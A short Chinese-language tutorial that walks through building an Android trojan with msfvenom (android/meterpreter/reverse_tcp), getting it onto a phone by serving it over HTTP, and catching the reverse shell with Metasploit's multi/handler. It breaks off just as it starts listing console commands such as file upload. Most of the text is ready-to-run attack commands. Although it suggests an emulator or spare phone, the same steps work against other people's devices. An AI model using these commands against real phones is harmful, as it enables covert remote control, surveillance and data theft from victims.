msf使用木马控制android手机
环境:
kali、手机模拟器(或不用的手机)。
要求
手机模拟器(或者手机)与电脑可以互相连通吗,即手机可以直接访问到kali。
步骤
1、制作木马。
命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.32.135 lport=4444 > android_shell.apk;
2、手机安装木马。
想办法把木马放到手机模拟器(或者手机)里。
例如:kali开启http服务,然后手机链接、下载、安装。
3、kali开启监听。
这里要注意的是,此处的参数要与制作木马时的参数保持一致。
msfconsole //开启msf
use exploit/multi/handler //选择监听模块
set lhost 192.168.32.135 //设置参数监听段的ip(kali的ip)
set lport 4444 //设置参数监听使用的端口(kali的端口)
set payload android/meterpreter/reverse_tcp //设置payload。(这一个必须设置)
run //开始监听
4、成功,开启控制台。
输入?后下面显示的都是可用的命令。
例如文件上传:
